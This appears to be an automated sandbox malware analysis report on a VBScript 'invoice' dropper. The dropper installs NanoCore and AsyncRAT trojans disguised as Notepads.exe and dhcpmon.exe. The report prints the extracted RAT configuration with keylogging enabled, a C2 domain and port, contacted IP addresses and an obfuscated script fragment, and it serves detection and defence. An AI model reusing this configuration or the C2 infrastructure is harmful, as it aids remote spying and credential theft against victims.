Analysis Report Invoice No F1019855_PDF.vbs

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Notepads.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7

Found malware configuration

Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Virustotal: Detection: 81%			Perma Link
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Metadefender: Detection: 90%			Perma Link
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Virustotal: Detection: 62%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\ame.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Virustotal: Detection: 81%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Metadefender: Detection: 90%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\fi.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Roaming\Notepads.exe	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: Invoice No F1019855_PDF.vbs	Virustotal: Detection: 29%			Perma Link
Source: Invoice No F1019855_PDF.vbs	ReversingLabs: Detection: 23%

Yara detected Nanocore RAT

Source: Yara match	File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Notepads.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.dhcpmon.exe.c40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.dhcpmon.exe.c40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.ame.exe.500000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.0.Notepads.exe.ee0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.0.Notepads.exe.f40000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.fi.exe.4f70000.10.unpack	Avira: Label: TR/NanoCore.fadte
Source: 4.0.fi.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.fi.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\fi.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: sys2021.linkpc.net

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940

Potential malicious VBS script found (has network functionality)

Source:

Initial file: zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
Source: global traffic	TCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 79.137.109.121 79.137.109.121

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.25.26

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: sys2021.linkpc.net

URLs found in memory or binary data

Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp

String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match	File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

Contains functionality to log keystrokes (.Net Source)

Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout
Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout
Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout
Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout
Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout
Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs	.Net Code: KeyboardLayout

Creates a DirectInput object (often for capturing keystrokes)

Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a raw input device (often for capturing keystrokes)

Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_0234131A NtQuerySystemInformation,		4_2_0234131A
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_023412DF NtQuerySystemInformation,		4_2_023412DF

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_0004524A		4_2_0004524A
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E2FA8		4_2_022E2FA8
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E23A0		4_2_022E23A0
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E8788		4_2_022E8788
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E3850		4_2_022E3850
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022EB56A		4_2_022EB56A
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E969B		4_2_022E969B
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E9388		4_2_022E9388
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E306F		4_2_022E306F
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_022E944F		4_2_022E944F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 7_2_00C4524A		7_2_00C4524A
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 7_2_05433850		7_2_05433850
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 7_2_054323A0		7_2_054323A0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 7_2_05432FA8		7_2_05432FA8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 7_2_0543306F		7_2_0543306F

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7

Java / VBScript file with very long strings (likely obfuscated code)

Source: Invoice No F1019855_PDF.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
